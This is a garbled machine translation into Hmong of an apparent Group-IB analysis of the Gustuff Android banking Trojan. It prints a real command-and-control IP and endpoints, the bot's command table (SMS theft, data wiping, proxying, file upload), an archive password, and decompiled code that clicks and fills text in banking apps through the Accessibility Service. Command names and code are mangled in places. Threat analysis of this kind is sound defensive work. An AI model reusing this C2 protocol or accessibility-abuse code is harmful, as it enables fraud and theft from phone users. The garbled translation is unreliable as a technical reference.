Lwm hnub Group-IB hais txog cov haujlwm ntawm mobile Android Trojan Gustuff. Nws ua haujlwm tshwj xeeb hauv kev lag luam thoob ntiaj teb, tawm tsam cov neeg siv khoom ntawm 100 lub tsev txhab nyiaj loj tshaj plaws txawv teb chaws, cov neeg siv mobile 32 crypto hnab nyiaj, nrog rau cov khoom lag luam e-lag luam loj. Tab sis tus tsim tawm ntawm Gustuff yog Lavxias-hais lus cybercriminal nyob rau hauv lub npe menyuam yaus Bestoffer. Txog thaum tsis ntev los no, nws tau qhuas nws Trojan ua "ib yam khoom loj rau cov neeg muaj kev paub thiab kev paub dhau los."
Malicious code analysis specialist at Group-IB Ivan Pisarev hauv nws txoj kev tshawb fawb, nws tham hauv kev nthuav dav txog yuav ua li cas Gustuff ua haujlwm thiab nws qhov kev phom sij yog dab tsi.
Gustuff yos hav zoov rau leej twg?
Gustuff belongs rau lub cim tshiab ntawm malware nrog kev ua haujlwm siab ua haujlwm. Raws li tus tsim tawm, Trojan tau dhau los ua qhov tshiab thiab txhim kho version ntawm AndyBot malware, uas txij li lub Kaum Ib Hlis 2017 tau tawm tsam Android xov tooj thiab nyiag nyiaj los ntawm phishing web cov ntaub ntawv masquerading raws li cov ntawv thov mobile ntawm cov tuam txhab thoob ntiaj teb paub zoo thiab kev them nyiaj. Bestoffer tau tshaj tawm tias tus nqi xauj tsev Gustuff Bot yog $ 800 toj ib hlis.
Kev soj ntsuam ntawm tus qauv Gustuff tau pom tias Trojan muaj peev xwm tsom cov neeg siv khoom siv mobile ntawm cov tsev txhab nyiaj loj tshaj plaws, xws li Bank of America, Bank of Scotland, JPMorgan, Wells Fargo, Capital One, TD Bank, PNC Bank, nrog rau cov hnab nyiaj crypto. Bitcoin hnab nyiaj, BitPay, Cryptopay, Coinbase, thiab lwm yam.
Ameslikas tsim raws li ib tug classic banking Trojan, nyob rau hauv tam sim no version Gustuff tau nthuav dav cov npe ntawm cov hom phiaj rau kev tawm tsam. Ntxiv rau Android daim ntawv thov rau cov tsev txhab nyiaj, tuam txhab fintech thiab cov kev pabcuam crypto, Gustuff yog tsom rau cov neeg siv khoom lag luam, khw muag khoom hauv online, kev them nyiaj thiab cov xa xov tam sim. Tshwj xeeb, PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut thiab lwm yam.
Nkag nkag: suav rau kev kis kab mob loj
Gustuff yog tus cwj pwm los ntawm "classic" vector ntawm kev nkag mus rau hauv Android smartphones los ntawm SMS xa ntawv nrog cov txuas mus rau APKs. Thaum lub cuab yeej Android kis tau tus Trojan ntawm cov lus txib ntawm tus neeg rau zaub mov, Gustuff tuaj yeem kis tau ntxiv los ntawm kev sib cuag cov ntaub ntawv ntawm tus xov tooj tus kab mob lossis los ntawm lub server database. Gustuff lub luag haujlwm yog tsim los rau kev kis kab mob loj thiab kev nqis peev ntau tshaj plaws ntawm kev lag luam ntawm nws cov neeg ua haujlwm - nws muaj qhov tshwj xeeb "nws pib-sau" ua haujlwm rau hauv kev siv nyiaj hauv tuam txhab nyiaj raug cai thiab cov hnab nyiaj crypto, uas tso cai rau koj kom ceev thiab ntsuas cov tub sab nyiag nyiaj.
Ib txoj kev tshawb fawb ntawm Trojan tau qhia tias qhov kev ua haujlwm autofill tau ua tiav hauv nws siv Accessibility Service, kev pabcuam rau cov neeg tsis taus. Gustuff tsis yog thawj Trojan kom ua tiav kev tiv thaiv kev cuam tshuam nrog lub qhov rais ntawm lwm daim ntawv thov siv qhov kev pabcuam hauv Android. Txawm li cas los xij, kev siv Cov Kev Pabcuam Kev Nkag Mus Ua ke nrog lub tsheb muab tub lim tseem tsawg heev.
Tom qab rub tawm mus rau tus neeg raug tsim txom lub xov tooj, Gustuff, siv Cov Kev Pabcuam Nkag Mus, muaj peev xwm cuam tshuam nrog lub qhov rais ntawm lwm cov ntawv thov (banking, cryptocurrency, nrog rau cov ntawv thov rau kev yuav khoom hauv online, kev xa xov, thiab lwm yam), ua qhov tsim nyog rau cov neeg tawm tsam. . Piv txwv li, ntawm cov lus txib ntawm tus neeg rau zaub mov, Trojan tuaj yeem nias cov nyees khawm thiab hloov cov txiaj ntsig ntawm cov ntawv nyeem hauv kev siv nyiaj hauv tuam txhab. Siv cov txheej txheem Kev Pabcuam Kev Nkag Mus Tso Cai tso cai rau Trojan hla dhau cov txheej txheem kev nyab xeeb uas siv los ntawm cov tsev txhab nyiaj los tawm tsam cov tiam dhau los ntawm cov xov tooj ntawm tes, nrog rau cov kev hloov pauv hauv txoj cai tswjfwm kev nyab xeeb uas siv los ntawm Google hauv cov qauv tshiab ntawm Android OS. Yog li, Gustuff "paub li cas" los lov tes taw Google Protect kev tiv thaiv: raws li tus sau, qhov haujlwm no ua haujlwm hauv 70% ntawm cov neeg mob.
Gustuff tseem tuaj yeem tso cov ntawv ceeb toom PUSH cuav nrog cov cim ntawm cov ntawv thov mobile raug cai. Tus neeg siv nyem rau ntawm PUSH ceeb toom thiab pom lub qhov rai phishing rub tawm los ntawm lub server, qhov twg nws nkag mus rau daim npav thov nyiaj lossis cov ntaub ntawv crypto hnab nyiaj. Hauv lwm qhov xwm txheej Gustuff, daim ntawv thov sawv cev ntawm PUSH ceeb toom tau tshwm sim tau qhib. Nyob rau hauv rooj plaub no, tus malware, raws li cov lus txib los ntawm tus neeg rau zaub mov los ntawm Kev Pabcuam Kev Nkag Mus Nkag, tuaj yeem sau daim foos teb ntawm daim ntawv thov kev lag luam rau kev ua lag luam dag.
Gustuff lub luag haujlwm tseem suav nrog kev xa cov ntaub ntawv hais txog tus kabmob kis mus rau lub server, muaj peev xwm nyeem / xa SMS, xa USSD thov, tso tawm SOCKS5 Proxy, ua raws li qhov txuas, xa cov ntaub ntawv (xws li cov duab scans ntawm cov ntaub ntawv, screenshots, duab) mus rau server, rov pib dua lub cuab yeej rau lub Hoobkas chaw.
Malware Analysis
Ua ntej txhim kho daim ntawv thov phem, Android OS qhia tus neeg siv lub qhov rais uas muaj cov npe ntawm cov cai thov los ntawm Gustuff:
Daim ntawv thov yuav raug ntsia tsuas yog tom qab tau txais tus neeg siv kev tso cai. Tom qab tso tawm daim ntawv thov, Trojan yuav qhia tus neeg siv lub qhov rais:
Tom qab ntawd nws yuav tshem tawm nws lub cim.
Gustuff tau ntim, raws li tus kws sau ntawv, los ntawm tus neeg ntim khoom los ntawm FTT. Tom qab pib, daim ntawv thov ib ntus hu rau CnC server kom tau txais cov lus txib. Ob peb cov ntaub ntawv peb tau tshuaj xyuas siv qhov chaw nyob IP ua tus tswj xyuas server 88.99.171[.]105 (Ntawm no peb yuav qhia nws li <%CnC%>).
Tom qab tso tawm, qhov kev pab cuam pib xa cov lus mus rau lub server http://<%CnC%>/api/v1/get.php.
Cov lus teb yuav tsum yog JSON hauv cov qauv hauv qab no:
{
"results" : "OK",
"command":{
"id": "<%id%>",
"command":"<%command%>",
"timestamp":"<%Server Timestamp%>",
"params":{
<%Command parameters as JSON%>
},
},
}Txhua lub sij hawm nkag mus rau daim ntawv thov, nws xa cov ntaub ntawv hais txog tus kab mob. Cov lus hom yog qhia hauv qab no. Nws yog tsim nyog sau cia hais tias cov teb tag nrho, ntxiv, apps ΠΈ tso cai - xaiv tau thiab yuav raug xa tsuas yog nyob rau hauv cov ntaub ntawv thov hais kom ua los ntawm CnC.
{
"info":
{
"info":
{
"cell":<%Sim operator name%>,
"country":<%Country ISO%>,
"imei":<%IMEI%>,
"number":<%Phone number%>,
"line1Number":<%Phone number%>,
"advertisementId":<%ID%>
},
"state":
{
"admin":<%Has admin rights%>,
"source":<%String%>,
"needPermissions":<%Application needs permissions%>,
"accesByName":<%Boolean%>,
"accesByService":<%Boolean%>,
"safetyNet":<%String%>,
"defaultSmsApp":<%Default Sms Application%>,
"isDefaultSmsApp":<%Current application is Default Sms Application%>,
"dateTime":<%Current date time%>,
"batteryLevel":<%Battery level%>
},
"socks":
{
"id":<%Proxy module ID%>,
"enabled":<%Is enabled%>,
"active":<%Is active%>
},
"version":
{
"versionName":<%Package Version Name%>,
"versionCode":<%Package Version Code%>,
"lastUpdateTime":<%Package Last Update Time%>,
"tag":<%Tag, default value: "TAG"%>,
"targetSdkVersion":<%Target Sdk Version%>,
"buildConfigTimestamp":1541309066721
},
},
"full":
{
"model":<%Device Model%>,
"localeCountry":<%Country%>,
"localeLang":<%Locale language%>,
"accounts":<%JSON array, contains from "name" and "type" of accounts%>,
"lockType":<%Type of lockscreen password%>
},
"extra":
{
"serial":<%Build serial number%>,
"board":<%Build Board%>,
"brand":<%Build Brand%>,
"user":<%Build User%>,
"device":<%Build Device%>,
"display":<%Build Display%>,
"id":<%Build ID%>,
"manufacturer":<%Build manufacturer%>,
"model":<%Build model%>,
"product":<%Build product%>,
"tags":<%Build tags%>,
"type":<%Build type%>,
"imei":<%imei%>,
"imsi":<%imsi%>,
"line1number":<%phonenumber%>,
"iccid":<%Sim serial number%>,
"mcc":<%Mobile country code of operator%>,
"mnc":<%Mobile network codeof operator%>,
"cellid":<%GSM-data%>,
"lac":<%GSM-data%>,
"androidid":<%Android Id%>,
"ssid":<%Wi-Fi SSID%>
},
"apps":{<%List of installed applications%>},
"permission":<%List of granted permissions%>
} Khaws cov ntaub ntawv configuration
Gustuff khaws cov ntaub ntawv tseem ceeb ua haujlwm hauv cov ntaub ntawv nyiam. Cov ntaub ntawv npe, nrog rau cov npe ntawm cov tsis muaj nyob hauv nws, yog qhov tshwm sim ntawm kev suav MD5 cov lej los ntawm txoj hlua. 15413090667214.6.1<%name%>qhov twg <%name%> - thawj lub npe-tus nqi. Python txhais ntawm lub npe tsim muaj nuj nqi:
nameGenerator(input):
output = md5("15413090667214.6.1" + input)
Hauv dab tsi hauv qab no peb yuav qhia nws li NameGenerator (cov tswv yim).
Yog li thawj cov ntaub ntawv npe yog: nameGenerator("API_SERVER_LIST"), nws muaj qhov tseem ceeb nrog cov npe hauv qab no:
| Lub npe sib txawv | nqi |
|---|---|
| nameGenerator("API_SERVER_LIST") | Muaj cov npe ntawm CnC chaw nyob hauv daim ntawv ntawm ib qho array. |
| nameGenerator("API_SERVER_URL") | Muaj qhov chaw nyob CnC. |
| nameGenerator("SMS_UPLOAD") | Tus chij yog teem los ntawm lub neej ntawd. Yog tias tus chij tau teeb tsa, xa SMS lus rau CnC. |
| nameGenerator("SMS_ROOT_NUMBER") | Tus lej xov tooj uas SMS tau txais los ntawm lub cuab yeej muaj kab mob yuav raug xa mus. Default yog null. |
| nameGenerator("SMS_ROOT_NUMBER_RESEND") | Tus chij raug tshem tawm los ntawm lub neej ntawd. Yog tias ntsia, thaum tus neeg mob tau txais SMS, nws yuav raug xa mus rau tus lej hauv paus. |
| nameGenerator("DEFAULT_APP_SMS") | Tus chij raug tshem tawm los ntawm lub neej ntawd. Yog tias tus chij no tau teeb tsa, daim ntawv thov yuav ua cov ntawv xa tuaj SMS. |
| nameGenerator("DEFAULT_ADMIN") | Tus chij raug tshem tawm los ntawm lub neej ntawd. Yog tias tus chij tau teeb tsa, daim ntawv thov muaj cai tswj hwm. |
| nameGenerator("DEFAULT_ACCESSIBILITY") | Tus chij raug tshem tawm los ntawm lub neej ntawd. Yog tias tus chij tau teeb tsa, ib qho kev pabcuam uas siv Cov Kev Pabcuam Nkag mus tau ua haujlwm. |
| nameGenerator("APPS_CONFIG") | Ib yam khoom JSON uas muaj cov npe ntawm cov haujlwm uas yuav tsum tau ua thaum muaj kev tshwm sim Accessibility cuam tshuam nrog ib daim ntawv thov tshwj xeeb tau tshwm sim. |
| nameGenerator("APPS_INSTALLED") | Khaws cov npe ntawm cov ntawv thov uas tau teeb tsa ntawm lub cuab yeej. |
| nameGenerator("IS_FIST_RUN") | Tus chij rov pib dua thaum pib thawj zaug. |
| nameGenerator("UNIQUE_ID") | Muaj tus cim tshwj xeeb. Tsim thaum lub bot yog launched thawj zaug. |
Module rau kev ua cov lus txib los ntawm lub server
Daim ntawv thov khaws cov chaw nyob ntawm CnC servers nyob rau hauv daim ntawv ntawm ib qho array encoded los ntawm Puag 85 kab. Daim ntawv teev npe ntawm CnC servers tuaj yeem hloov pauv thaum tau txais cov lus txib tsim nyog, qhov twg cov chaw nyob yuav raug khaws cia rau hauv cov ntaub ntawv nyiam.
Hauv kev teb rau qhov kev thov, tus neeg rau zaub mov xa cov lus txib mus rau daim ntawv thov. Nws yog ib qho tsim nyog sau cia tias cov lus txib thiab cov ntsuas tau nthuav tawm hauv JSON hom. Daim ntawv thov tuaj yeem ua cov lus txib hauv qab no:
| pab neeg | piav qhia |
|---|---|
| forwardStart | Pib xa SMS lus tau txais los ntawm lub cuab yeej muaj kab mob mus rau CnC server. |
| forwardStop | Tsis txhob xa SMS tau txais los ntawm lub cuab yeej muaj kab mob mus rau CnC server. |
| ussdRun | Ua raws li USSD thov. Tus lej uas koj yuav tsum tau ua daim ntawv thov USSD yog nyob rau hauv JSON teb "tus lej". |
| xaSms | Xa ib SMS lus (yog tias tsim nyog, cov lus yog "sib cais" rau hauv seem). Raws li qhov tsis muaj, cov lus txib yuav siv JSON cov khoom uas muaj cov teb "rau" - tus lej lo lus zais thiab "lub cev" - lub cev ntawm cov lus. |
| xaSmsAb | Xa SMS lus (yog tias tsim nyog, cov lus "sib cais" rau hauv ntu) rau txhua tus neeg hauv daim ntawv teev npe ntawm tus kab mob. Lub sijhawm ntawm kev xa xov yog 10 vib nas this. Lub cev ntawm cov lus yog nyob rau hauv JSON teb "lub cev" |
| xaSmsMass | Xa SMS lus (yog tias tsim nyog, cov lus yog "split" rau hauv qhov chaw) rau cov neeg uas tau teev tseg hauv cov lus txib tsis. Lub sijhawm nruab nrab ntawm kev xa xov yog 10 vib nas this. Raws li qhov tsis muaj, cov lus txib yuav siv JSON array (qhov "sms" teb), cov ntsiab lus uas muaj cov teb "rau" - tus lej lo lus zais thiab "lub cev" - lub cev ntawm cov lus. |
| changeServer | Cov lus txib no tuaj yeem coj tus nqi nrog tus yuam sij "url" raws li qhov ntsuas - tom qab ntawd tus bot yuav hloov tus nqi ntawm nameGenerator ("SERVER_URL"), lossis "array" - tom qab ntawd tus bot yuav sau cov array rau nameGenerator ("API_SERVER_LIST") Yog li, daim ntawv thov hloov chaw nyob ntawm CnC servers. |
| admin Number | Cov lus txib yog tsim los ua haujlwm nrog tus lej hauv paus. Cov lus txib lees txais JSON cov khoom nrog cov tsis muaj hauv qab no: "number" - hloov lub npeGenerator("ROOT_NUMBER") rau tus nqi tau txais, "rov xa" - hloov npeGenerator("SMS_ROOT_NUMBER_RESEND"), "sendId" - xa mus rau nameGenerator("ROOT_NUMBER" ) unique ID. |
| updateInfo | Xa cov ntaub ntawv hais txog tus kab mob no mus rau lub server. |
| wipeData | Cov lus txib yog npaj los tshem tawm cov neeg siv cov ntaub ntawv. Nyob ntawm seb lub npe ntawm daim ntawv thov raug tso tawm, cov ntaub ntawv raug tshem tawm tag nrho nrog lub cuab yeej rov pib dua (tus neeg siv thawj zaug), lossis tsuas yog cov neeg siv cov ntaub ntawv raug tshem tawm (tus neeg siv thib ob). |
| socksStart | Tua tawm Proxy module. Kev ua haujlwm ntawm module tau piav qhia hauv ib ntu. |
| thom khwmStop | Nres lub Proxy module. |
| openLink | Ua raws li qhov txuas. Qhov txuas yog nyob rau hauv JSON parameter hauv qab "url" tus yuam sij. "android.intent.action.VIEW" yog siv los qhib qhov txuas. |
| uploadAllSms | Xa tag nrho SMS lus tau txais los ntawm lub cuab yeej mus rau lub server. |
| uploadAllPhotos | Xa cov duab los ntawm cov cuab yeej muaj kab mob mus rau URL. URL los ua ib qho parameter. |
| uploadFile | Xa cov ntaub ntawv mus rau qhov URL los ntawm cov cuab yeej muaj kab mob. URL los ua ib qho parameter. |
| uploadPhoneNumbers | Xa xov tooj los ntawm koj daim ntawv teev npe mus rau lub server. Yog tias JSON tus nqi khoom nrog tus yuam sij "ab" tau txais raws li qhov ntsuas, daim ntawv thov tau txais cov npe hu los ntawm phau ntawv xov tooj. Yog tias ib qho khoom JSON nrog tus yuam sij "sms" tau txais raws li qhov ntsuas, daim ntawv thov nyeem cov npe hu los ntawm cov neeg xa xov SMS. |
| hloov Archive | Daim ntawv thov rub tawm cov ntaub ntawv los ntawm qhov chaw nyob uas tuaj raws li qhov ntsuas uas siv tus yuam sij "url". Cov ntaub ntawv rub tawm tau raug cawm nrog lub npe "archive.zip". Daim ntawv thov yuav tom qab ntawd unzip cov ntaub ntawv, xaiv siv tus password archive "b5jXh37gxgHBrZhQ4j3D". Cov ntaub ntawv unzipped tau txais kev cawmdim nyob rau hauv [sab nraud cia] / hgps directory. Hauv phau ntawv teev npe no, daim ntawv thov khaws cov web fakes (pib hauv qab no). |
| kev nqis tes ua | Cov lus txib yog tsim los ua haujlwm nrog Kev Pabcuam Kev Ua Haujlwm, uas tau piav qhia hauv ntu cais. |
| xeem | Tsis ua dab tsi. |
| download | Cov lus txib yog npaj los rub tawm cov ntaub ntawv los ntawm cov chaw taws teeb tswj hwm thiab khaws cia rau hauv "Downloads" directory. Lub URL thiab cov ntaub ntawv npe tuaj raws li qhov ntsuas, teb hauv JSON parameter khoom, raws li: "url" thiab "fileName". |
| tshem tawm | Tshem tawm cov ntaub ntawv los ntawm "Downloads" directory. Cov ntaub ntawv npe los ntawm JSON parameter nrog rau "fileName" tus yuam sij. Tus txheej txheem cov ntaub ntawv npe yog "tmp.apk". |
| ceeb toom | Qhia cov ntawv ceeb toom nrog cov lus piav qhia thiab cov ntawv sau npe uas tau teev tseg los ntawm kev tswj hwm server. |
Hais kom ua hom ntawv ceeb toom:
{
"results" : "OK",
"command":{
"id": <%id%>,
"command":"notification",
"timestamp":<%Server Timestamp%>,
"params":{
"openApp":<%Open original app or not%>,
"array":[
{"title":<%Title text%>,
"desc":<%Description text%>,
"app":<%Application name%>}
]
},
},
}Cov ntawv ceeb toom tsim los ntawm cov ntaub ntawv nyob rau hauv kev tshawb xyuas zoo ib yam li cov ntawv ceeb toom tsim los ntawm daim ntawv thov teev nyob rau hauv daim teb app. Yog tus nqi teb qhibApp - Muaj tseeb, thaum qhib kev ceeb toom, daim ntawv thov teev tseg hauv daim teb tau pib app. Yog tus nqi teb qhibApp - False, ces:
- Lub qhov rais phishing qhib, cov ntsiab lus uas tau rub tawm los ntawm cov npe <%external storage%>/hgps/<%filename%>
- Lub qhov rais phishing qhib, cov ntsiab lus uas tau rub tawm los ntawm lub server <%url%>?id=<%Bot id%>&app=<%Application name%>
- Lub qhov rais phishing qhib, zais Google Play Card, nrog rau lub sijhawm los nkag mus rau daim npav cov ntsiab lus.
Daim ntawv thov xa cov txiaj ntsig ntawm cov lus txib rau <%CnC%>set_state.php raws li JSON cov khoom hauv hom hauv qab no:
{
"command":
{
"command":<%command%>,
"id":<%command_id%>,
"state":<%command_state%>
}
"id":<%bot_id%>
}
Kev Pabcuam
Cov npe ntawm cov lus txib uas cov txheej txheem thov suav nrog txiav txim. Thaum tau txais cov lus txib, cov lus txib ua haujlwm nkag mus rau qhov kev pabcuam no kom ua tiav cov lus txib txuas ntxiv. Cov kev pabcuam lees txais JSON cov khoom raws li qhov ntsuas. Cov kev pabcuam tuaj yeem ua tiav cov lus txib hauv qab no:
1. PARAMS_ACTION - thaum tau txais cov lus txib no, cov kev pabcuam thawj zaug tau txais los ntawm JSON parameter tus nqi ntawm Hom yuam sij, uas tuaj yeem ua raws li hauv qab no:
- kev pabcuam - cov lus txib tau txais tus nqi los ntawm qhov tseem ceeb los ntawm JSON parameter suav nrog tsis tseem ceeb. Yog tias tus chij muaj tseeb, daim ntawv thov teeb tsa tus chij FLAG_ISOLATED_PROCESS mus rau ib qho kev pabcuam uas siv Kev Pabcuam Kev Nkag Mus Nkag. Li no qhov kev pabcuam yuav raug muab tso rau hauv cov txheej txheem cais.
- hauv paus - tau txais thiab xa mus rau tus neeg rau zaub mov cov ntaub ntawv hais txog lub qhov rais uas tam sim no tsom mus rau. Daim ntawv thov tau txais cov ntaub ntawv siv chav AccessibilityNodeInfo.
- admin - thov cov cai tswj hwm.
- ncua - Ncua Kev Ua Haujlwm rau tus naj npawb ntawm milliseconds teev nyob rau hauv parameter rau "cov ntaub ntawv" tus yuam sij.
- qhov rais - xa ib daim ntawv teev cov qhov rais pom rau tus neeg siv.
- nruab - nruab daim ntawv thov ntawm tus kab mob. Lub npe ntawm lub pob archive yog nyob rau hauv "fileName" tus yuam sij. Lub archive nws tus kheej yog nyob rau hauv Downloads directory.
- ntiaj teb no - lub subcommand yog npaj rau kev los ntawm lub qhov rais tam sim no:
- ntawm Quick Settings menu
- rov qab
- tsev
- rau cov ntawv ceeb toom
- mus rau lub qhov rais qhib apps uas nyuam qhuav qhib
- Tua tawm - tso tawm daim ntawv thov. Daim ntawv thov lub npe los ua ib qho parameter los ntawm qhov tseem ceeb cov ntaub ntawv.
- suab - hloov lub suab hom rau silence.
- account - tig rau lub teeb rov qab ntawm lub vijtsam thiab cov keyboard kom pom qhov kaj. Daim ntawv thov ua qhov kev txiav txim no siv WakeLock, qhia txog txoj hlua [Application lable]: INFO ua ib daim ntawv
- permissionOverlay - txoj haujlwm tsis raug siv (cov lus teb rau kev ua tiav yog {"message": "Tsis txhawb"} lossis {"message": "low sdk"})
- piav tes piav taw - kev ua haujlwm tsis raug siv (cov lus teb rau kev ua tiav yog {"message": "Tsis txhawb"} lossis {"message": "Low API"})
- permissions - Cov lus txib no yog tsim nyog los thov kev tso cai rau daim ntawv thov. Txawm li cas los xij, cov lus nug ua haujlwm tsis raug siv, yog li cov lus txib tsis muaj qab hau. Cov npe ntawm cov cai thov los ua JSON array nrog rau "kev tso cai" tus yuam sij. Standard daim ntawv teev:
- android.permission.READ_PHONE_STATE
- android.permission.READ_CONTACTS
- android.permission.CALL_PHONE
- android.permission.RECEIVE_SMS
- android.permission.SEND_SMS
- android.permission.READ_SMS
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- qhib - tso saib lub qhov rais phishing. Nyob ntawm qhov parameter los ntawm tus neeg rau zaub mov, daim ntawv thov tuaj yeem tso saib cov windows phishing hauv qab no:
- Qhia lub qhov rai phishing uas nws cov ntsiab lus tau sau rau hauv cov ntaub ntawv hauv phau ntawv teev npe <%external directory%>/hgps/<%param_filename%>. Cov txiaj ntsig ntawm cov neeg siv kev cuam tshuam nrog lub qhov rais yuav raug xa mus rau <%CnC%>/records.php
- Qhia lub qhov rai phishing uas nws cov ntsiab lus tau thauj khoom ua ntej los ntawm qhov chaw nyob <%url_param%>?id=<%bot_id%>&app=<%packagename%>. Cov txiaj ntsig ntawm cov neeg siv kev cuam tshuam nrog lub qhov rais yuav raug xa mus rau <%CnC%>/records.php
- Qhia lub qhov rais phishing uas yog Google Play Card.
- sib tham sib - cov lus txib yog tsim los cuam tshuam nrog lub qhov rais ntsiab ntawm lwm daim ntawv thov siv AcessibilityService. Ib qho kev pabcuam tshwj xeeb tau muab coj los siv rau hauv qhov kev pabcuam rau kev sib tham. Daim ntawv thov nyob rau hauv kev tshawb nrhiav tuaj yeem cuam tshuam nrog windows:
- Tam sim no nquag. Nyob rau hauv cov ntaub ntawv no, lub parameter muaj tus id los yog ntawv nyeem (lub npe) ntawm cov khoom uas koj yuav tsum tau sib tham.
- Pom tau rau tus neeg siv thaum lub sijhawm hais kom ua tiav. Daim ntawv thov xaiv windows los ntawm id.
Tau txais cov khoom AccessibilityNodeInfo Rau cov ntsiab lus ntawm qhov kev txaus siab, daim ntawv thov, nyob ntawm qhov tsis, tuaj yeem ua cov haujlwm hauv qab no:
- focus β teeb tsom rau qhov khoom.
- nyem β nyem rau ntawm qhov khoom.
- actionId - ua qhov kev txiav txim los ntawm ID.
- setText β hloov cov ntawv nyeem ntawm ib yam khoom. Hloov cov ntawv nyeem yog ua tau nyob rau hauv ob txoj kev: ua ib qho kev txiav txim ACTION_SET_TEXT (yog hais tias lub Android version ntawm tus kab mob no yog hluas dua los yog sib npaug rau LIS CEEB), lossis los ntawm kev tso ib txoj hlua rau ntawm daim ntawv teev lus thiab muab tso rau hauv ib qho khoom (rau cov laus dua). Cov lus txib no tuaj yeem siv los hloov cov ntaub ntawv hauv daim ntawv thov nyiaj txiag.
2. PARAMS_ACTIONS - tib yam li PARAMS_ACTION, tsuas yog JSON array ntawm cov lus txib tuaj txog.
Nws zoo nkaus li tias ntau tus neeg yuav txaus siab rau qhov ua haujlwm ntawm kev cuam tshuam nrog lub qhov rais ntawm lwm daim ntawv thov zoo li. Qhov no yog li cas qhov kev ua haujlwm no tau siv hauv Gustuff:
boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
int count = action.optInt("repeat", 1);
Iterator aiListIterator = ((Iterable)aiList).iterator();
int count = 0;
while(aiListIterator.hasNext()) {
Object ani = aiListIterator.next();
if(1 <= count) {
int index;
for(index = 1; true; ++index) {
if(action.has("focus")) {
if(((AccessibilityNodeInfo)ani).performAction(1)) {
++count;
}
}
else if(action.has("click")) {
if(((AccessibilityNodeInfo)ani).performAction(16)) {
++count;
}
}
else if(action.has("actionId")) {
if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
++count;
}
}
else if(action.has("setText")) {
customHeader ch = CustomAccessibilityService.a;
Context context = this.getApplicationContext();
String text = action.optString("setText");
if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
++count;
}
}
if(index == count) {
break;
}
}
}
((AccessibilityNodeInfo)ani).recycle();
}
res.addPropertyNumber("res", Integer.valueOf(count));
}Text hloov ua haujlwm:
boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
boolean result;
if(Build$VERSION.SDK_INT >= 21) {
Bundle b = new Bundle();
b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
result = ani.performAction(0x200000, b); // ACTION_SET_TEXT
}
else {
Object clipboard = context.getSystemService("clipboard");
if(clipboard != null) {
((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
result = ani.performAction(0x8000); // ACTION_PASTE
}
else {
result = false;
}
}
return result;
}Yog li, nrog rau qhov tseeb configuration ntawm tus neeg rau zaub mov tswj, Gustuff muaj peev xwm sau cov ntawv nyeem nyob rau hauv daim ntawv thov banking thiab nias rau ntawm cov nyees khawm tsim nyog los ua kom tiav cov kev sib pauv. Lub Trojan tseem tsis tas yuav nkag mus rau hauv daim ntawv thov - nws txaus los xa cov lus txib los tso saib PUSH ceeb toom thiab tom qab ntawd qhib daim ntawv thov nyiaj txiag yav dhau los. Tus neeg siv yuav lees paub nws tus kheej, tom qab ntawd Gustuff yuav tuaj yeem sau lub tsheb.
SMS lus ua module
Daim ntawv thov nruab ib qho kev tshwm sim handler rau tus kab mob ntaus ntawv txais SMS lus. Daim ntawv thov nyob rau hauv kev kawm tuaj yeem tau txais cov lus txib los ntawm tus neeg teb xov tooj, uas tuaj rau hauv lub cev ntawm SMS lus. Cov lus txib tuaj hauv hom:
7!5=<%Base64 encoded command%>
Daim ntawv thov tshawb nrhiav rau txoj hlua hauv txhua cov lus xa SMS 7! 5 !, thaum kuaj pom txoj hlua, nws txiav txim siab txoj hlua los ntawm Base64 ntawm offset 4 thiab ua tiav cov lus txib. Cov lus txib zoo ib yam li cov nrog CnC. Cov txiaj ntsig ua tiav raug xa mus rau tib tus lej los ntawm cov lus txib tuaj. Teb hom ntawv:
7 * 5 = <%Base64 encode ntawm "result_code command"%>
Optionally, daim ntawv thov tuaj yeem xa tag nrho cov lus tau txais mus rau tus lej hauv paus. Ua li no, tus naj npawb hauv paus yuav tsum tau teev nyob rau hauv cov ntaub ntawv nyiam thiab cov lus xa rov qab chij yuav tsum tau teeb tsa. Ib qho SMS xa mus rau tus neeg tawm tsam tus lej hauv hom:
<%From tooj%> - <%Time, format: dd/MM/yyyy HH:mm:ss%> <%SMS body%>
Tsis tas li, xaiv tau, daim ntawv thov tuaj yeem xa cov lus rau CnC. Cov lus SMS raug xa mus rau tus neeg rau zaub mov hauv JSON hom:
{
"id":<%BotID%>,
"sms":
{
"text":<%SMS body%>,
"number":<%From number%>,
"date":<%Timestamp%>
}
}Yog tias tus chij tau teeb tsa nameGenerator("DEFAULT_APP_SMS") - daim ntawv thov nres ua cov lus SMS thiab tshem tawm cov npe ntawm cov lus tuaj.
Proxy module
Daim ntawv thov nyob rau hauv txoj kev kawm muaj Backconnect Proxy module (tom qab no hu ua Proxy module), uas muaj cov chav kawm cais uas suav nrog thaj chaw zoo li qub nrog kev teeb tsa. Cov ntaub ntawv teeb tsa tau muab khaws cia rau hauv cov qauv hauv daim ntawv ntshiab:
Txhua qhov kev ua los ntawm Proxy module tau nkag mus rau hauv cov ntaub ntawv. Txhawm rau ua qhov no, daim ntawv thov nyob rau sab nraud cia tsim cov npe hu ua "logs" (lub ProxyConfigClass.logsDir teb hauv chav kawm configuration), uas cov ntaub ntawv teev cia. Kev sau npe tshwm sim hauv cov ntaub ntawv nrog cov npe:
- main.txt - cov haujlwm ntawm chav kawm hu ua CommandServer tau nkag rau hauv cov ntaub ntawv no. Hauv dab tsi hauv qab no, nkag mus rau txoj hlua str rau hauv cov ntaub ntawv no yuav raug suav tias yog mainLog(str).
- session-<%id%>.txt - Cov ntaub ntawv no khaws cov ntaub ntawv teev npe cuam tshuam nrog kev sib tham npe tshwj xeeb. Hauv dab tsi hauv qab no, nkag mus rau txoj hlua str rau cov ntaub ntawv no yuav raug suav tias yog sessionLog (str).
- server.txt - Cov ntaub ntawv no yog siv los sau tag nrho cov ntaub ntawv sau rau hauv cov ntaub ntawv hais saum toj no.
Log data format:
<%Date%> [Thread[<% xov id%>], id[]]: log-string
